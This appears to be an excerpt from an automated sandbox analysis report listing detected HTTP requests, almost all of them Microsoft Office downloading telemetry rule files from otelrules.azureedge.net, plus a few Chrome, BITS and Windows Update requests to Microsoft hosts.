          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: 0x8DCEC757C1AD1D1If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: 0x8DCEC757C1AD1D1If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=179335-179335If-Range: 0x8DCEC757C1AD1D1
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=x+GKtrEwdR9nSl4&MD=2zgGtu86 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
